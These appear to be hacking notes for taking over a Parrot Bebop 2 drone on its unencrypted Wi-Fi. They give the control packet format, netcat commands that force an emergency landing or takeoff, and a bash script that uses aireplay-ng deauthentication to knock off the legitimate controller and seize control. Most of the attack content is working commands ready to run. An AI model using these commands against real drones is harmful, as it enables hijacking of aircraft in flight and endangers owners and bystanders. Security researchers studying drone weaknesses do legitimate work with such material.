Hacking Parrot Bebop 2

Case 1. Default Setting, without any authentication and encryption

steps

video demo and slides

The drone accepts commands on port 54321/udp, but that port is only opened after authenticating over port 44444/tcp.

SDK: https://developer.parrot.com/docs/SDK3/

Drone movement control packets (to drone port 54321/udp)

Header:

u8 frame type

u8 frame id

u8 sequence num

u32 packet length

Content:

u8* data buffer

u8 1 (ARCOMMANDS_ID_PROJECT_ARDRONE3)

u8 0 (ARCOMMANDS_ID_ARDRONE3_CLASS_PILOTING)

u16 3 (ARCOMMANDS_ID_ARDRONE3_PILOTING_CMD_LANDING)

02 0a 00 0b 00 00 00 01 00 03 00

Example usage:

echo '{ "d2c_port":43210, "controller_type":"qwer","controller_name":"asdf" }' | nc 192.168.42.1 44444

sleep 1

if [ -z $1 ]; then

echo "emergency landing"

echo -e -n "\x02\x0a\x01\x0b\x0\x0\x0\x1\x0\x4\x0" | nc -u -w 1 192.168.42.1 54321 # land

else

echo "taking off"

echo -e -n "\x02\x0a\x01\x0b\x0\x0\x0\x1\x0\x1\x0" | nc -u -w 1 192.168.42.1 54321 # takeoff

fi

awful bash script that does this somewhat automatically after connecting to the drone's wifi network

must manually define

• CHANNEL (channel the drone is operating on, can get through airodump-ng; randomly changes on drone boot)

• BSSID (MAC addr of the drone)

• CLIENT (MAC addr of the controller)

• INTERFACE (name of interface created by airmon-ng)

#!/bin/bash

COMMAND='{ "d2c_port":43210, "controller_type":"qwer","controller_name":"asdf" }'

CHANNEL=8

BSSID=a0:14:3d:fb:f7:bc #drone MAC addr

CLIENT=a0:14:3d:fb:fa:08 #controller MAC addr

INTERFACE=wlan1mon

DEAUTH_SENT=false

I=0

while true; do

COMMAND=$(echo "$COMMAND" | sed 's/\x0/ /g')

RESULT=$(echo -e "$COMMAND" | nc 192.168.42.1 44444);

if echo $RESULT | grep -q '"status": -3999'; then

if [[ $DEAUTH_SENT = false ]] || [[ $I -eq 5 ]]; then

echo sending DEAUTH

airodump-ng $INTERFACE --bssid $BSSID -c $CHANNEL &

PID=$!

#sleep 0.2

aireplay-ng --deauth 2 -a $BSSID -c $CLIENT $INTERFACE

DEAUTH_SENT=true

kill -2 $PID

#sleep 0.2

I=0

fi

printf "."

I=$I+1

elif echo $RESULT | grep -q '"status": 0'; then

echo "WINRAR"

export DISPLAY=:0

python drone_land.py

sleep 10000

else

echo

echo "UNHANDLED RESULT $RESULT"

fi

sleep 0.1

done

Case 2. Configure Encryption (WPA/WPS2)

steps. Let us how we can break them. steps. video demo